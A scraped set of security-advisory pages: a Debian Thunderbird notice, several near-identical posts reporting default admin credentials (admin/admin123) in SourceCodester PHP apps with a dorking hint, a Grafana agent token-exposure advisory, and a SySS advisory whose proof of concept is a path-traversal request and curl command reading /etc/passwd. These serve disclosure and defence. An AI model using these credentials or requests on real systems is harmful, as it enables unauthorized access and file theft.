Debian Linux Security Advisory 5767-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5767-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 08, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2024-8381 CVE-2024-8382 CVE-2024-8383 CVE-2024-8384Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.15.0-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmbd3NAACgkQEMKTtsN8TjaJqg/9F6LzPoeAiIS3G2YKXV7a44Y4Fz4FwzrNCvbB7w8fP9MxubpDYVM9k8rWG5pvPWApM5wUPZ3GohG8wbEGD75CabwmGPFDlmPChwK9cJ1OfqrlK2Hy21Ng39571d/1osgORy6WEwl978RFW7FTWDVo74qjjHL2r/dbh3xbKd6HneEo9uEmp6zBxiDJnX4vJ2IuuBHMB+9QXRGnXTkEgsFD+jQEAUIgTSucHyFIJuUDrQC/HfA1rr0uTwNJ+92klAgjQ9AbzdEjdN/LU5160U6+QsF/68iX7aBYTCyHco6Qgmtb2C3xFuFpFNbxUNNzUdSrqZi4tdumN55MDNQEygAVBjV0RZhiKc4mixG5K60bx3SVAjXwMZozQ2YK7hYrsHPtQFaZouiMPcg/PblEd2lp4bwDULkyAU0JtJtQL9jVPHa7IC52gfsZwZCpizlhInFrgeCCGbp+CJdEieuTosdLLleimjzD43pGT5/GnwCvCjcXs2GdKveUmra5QphP2Xhk5ZTWAE5dljeaZkFEW42YQ04gzHA5F6N5UrVOgg9XXFwyB3oU9wjkY+8TL1Y1KMhWcx8TRug++K16PflV6DvuLnV9mx0t+YcZoZ9M0bighMk0RYrUX3r0aFiLWfkMzWbNiIYdsTqdUTjx1v1/gS4txhh+WvVwqvczFKdNA3UMXh4==56DR-----END PGP SIGNATURE-----

Debian Security Advisory 5767-1

POMS version 1.0 suffers from an ignored default credential vulnerability.

**POMS 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

POMS version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | e96b4926531826f22ee72eeb7f339d7761192178a35f69af5d5141abbc8b63c1

Download | Favorite | View

**POMS 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : POMS v1.0 Insecure Settings Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

POMS 1.0 Insecure Settings

Pharmacy Management System version version 1.0 suffers from an ignored default credential vulnerability.

**Pharmacy Management System version 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Pharmacy Management System version version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 6c367c1c4b085e72851f370194180a14f132217419dbc26645d989d1f50bd05c

Download | Favorite | View

**Pharmacy Management System version 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Pharmacy Management System version 1.0 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/demoocom/admin/?page=user/manage_user&id=8Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Pharmacy Management System version 1.0 Insecure Settings

PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

**PDF Generator Web Application 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

PDF Generator Web Application version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit, web

SHA-256 | ea0edf3e01f27c48e18ff7db4471b92d0d058e7c65718cf02003efd67a75fb49

Download | Favorite | View

**PDF Generator Web Application 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : PDF Generator Web Application v1.0 Insecure Settings Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

PDF Generator Web Application 1.0 Insecure Settings

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

**Online Travel Agency System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Travel Agency System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 33fc5279701fd33248284f756fca51419cb1e797d0158e5bc05d6612e87f5c60

Download | Favorite | View

**Online Travel Agency System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Travel Agency System v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/online-travel-agency-system-using-php.html                                                   |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Online Travel Agency System 1.0 Insecure Settings

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

**Online Tours and Travels Management System 1.0 Insecure Settings**

Posted Sep 9, 2024

Authored by indoushka

Online Tours and Travels Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4a5b9ca0712889f86abf481cbffe6181dc9758a00fca6adde682fe4a8dea1f53

Download | Favorite | View

**Online Tours and Travels Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,689)
*   Arbitrary (17,038)
*   BBS (2,859)
*   Bypass (1,904)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,205)
*   Encryption (2,394)
*   Exploit (54,147)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (918)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,208)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,402)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,830)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,044)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,704)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,055)
*   Web (10,131)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,118)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,071)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,733)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,808)
*   UNIX (9,452)
*   UnixWare (188)
*   Windows (6,763)
*   Other

Online Tours and Travels Management System 1.0 Insecure Settings

### Impact

Users running the Synthetic Monitoring agent in their local network are impacted. The authentication token used to communicate with the Synthetic Monitoring API is exposed thru a debugging endpoint. This token can be used to retrieve the Synthetic Monitoring checks created by the user and assigned to the agent identified with that token. The Synthetic Monitoring API will reject connections from already-connected agents, so access to the token does not guarantee access to the checks.

### Patches

Fixed version is v0.12.0

Users are advised to rotate the agent tokens.

After upgrading to version v0.12.0 or later, it's recommended that user's of distribution packages (e.g. Debian or RedHat and their derivatives) review the configuration stored in `/etc/synthetic-monitoring/synthetic-monitoring-agent.conf`, specifically the `API_TOKEN` variable which has been renamed to `SM_AGENT_API_TOKEN`.

### Workarounds

With all previous versions, it's recommended that users review the agent settings and set the HTTP listening address in a manner that limits the exposure, for example, localhost or a non-routed network, by using the command line parameter `-listen-address`, e.g. `-listen-address localhost:4050`.

### References

The following changes have been made to address this issue:

- [Disable debug endpoint by default](https://github.com/grafana/synthetic-monitoring-agent/pull/373)
- [Allow retrieving the token from the environment](https://github.com/grafana/synthetic-monitoring-agent/pull/374)
- [Default to listening on localhost](https://github.com/grafana/synthetic-monitoring-agent/pull/375)

### For more information

If you have any questions or comments about this advisory:
* You can use the [Synthetic Monitoring Agent discussions](https://github.com/grafana/synthetic-monitoring-agent/discussions).
* Issues should be reported in the [Synthetic Monitoring Agent issues](https://github.com/grafana/synthetic-monitoring-agent/issues).
* Email us at [security@grafana.com](mailto:security@grafana.com).


**Impact**

Users running the Synthetic Monitoring agent in their local network are impacted. The authentication token used to communicate with the Synthetic Monitoring API is exposed thru a debugging endpoint. This token can be used to retrieve the Synthetic Monitoring checks created by the user and assigned to the agent identified with that token. The Synthetic Monitoring API will reject connections from already-connected agents, so access to the token does not guarantee access to the checks.

**Patches**

Fixed version is v0.12.0

Users are advised to rotate the agent tokens.

After upgrading to version v0.12.0 or later, it's recommended that user's of distribution packages (e.g. Debian or RedHat and their derivatives) review the configuration stored in /etc/synthetic-monitoring/synthetic-monitoring-agent.conf, specifically the API_TOKEN variable which has been renamed to SM_AGENT_API_TOKEN.

**Workarounds**

With all previous versions, it's recommended that users review the agent settings and set the HTTP listening address in a manner that limits the exposure, for example, localhost or a non-routed network, by using the command line parameter -listen-address, e.g. -listen-address localhost:4050.

**References**

The following changes have been made to address this issue:

*   Disable debug endpoint by default
*   Allow retrieving the token from the environment
*   Default to listening on localhost

**For more information**

If you have any questions or comments about this advisory:

*   You can use the Synthetic Monitoring Agent discussions.
*   Issues should be reported in the Synthetic Monitoring Agent issues.
*   Email us at security@grafana.com.

**References**

*   GHSA-9j4f-f249-q5w8
*   https://nvd.nist.gov/vuln/detail/CVE-2022-46156
*   grafana/synthetic-monitoring-agent#373
*   grafana/synthetic-monitoring-agent#374
*   grafana/synthetic-monitoring-agent#375
*   grafana/synthetic-monitoring-agent@d8dc7f9
*   https://github.com/grafana/synthetic-monitoring-agent/releases/tag/v0.12.0
*   https://pkg.go.dev/vuln/GO-2022-1132

GHSA-9j4f-f249-q5w8: Default installation of `synthetic-monitoring-agent` exposes sensitive information

C-MOR Video Surveillance version 5.2401 suffers from a path traversal vulnerability.

Advisory ID:               SYSS-2024-025  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Relative Path Traversal (CWE-23)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45178  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to download  
arbitrary files from the C-MOR system via a path traversal attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionalities are vulnerable to path traversal attacks, which is  
due to insufficient user input validation.

For instance, the download functionality for backups provided by the  
script "download-bkf.pml" is vulnerable to a path traversal  
attack via the parameter "bkf".

This enables an authenticated user to download arbitrary files as  
Linux user "www-data" from the C-MOR system.

Another path traversal attack is in the script "show-movies.pml",  
which can be exploited via the parameter "cam".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following HTTP POST request with the relative path  
"../../../../etc/passwd" as value for the parameter "bkf", it is  
possible to download the file "/etc/passwd":

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26

bkf=../../../../etc/passwd

An example of a successful path traversal attack is demonstrated via  
the following curl command:

$ curl -X POST -d 'bkf=../../../../etc/passwd' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
Debian-exim:x:101:103::/var/spool/exim4:/bin/false  
statd:x:102:65534::/var/lib/nfs:/bin/false  
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin  
cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash  
postfix:x:104:107::/var/spool/postfix:/bin/false  
stunnel4:x:105:109::/var/run/stunnel4:/bin/false  
mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false  
messagebus:x:107:113::/var/run/dbus:/bin/false  
ntp:x:108:114::/home/ntp:/bin/false  
download:x:1002:1002:Download User:/home/download:/bin/bash

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Path Traversal

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

**Online Sports Complex Booking System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7ef39718e1694996d6c3234f87defd525659e7cde8353fa86e03c43c5fd1bf04

Download | Favorite | View

**Online Sports Complex Booking System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Sports Complex Booking System v1.0 Insecure Settings Vulnerability                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
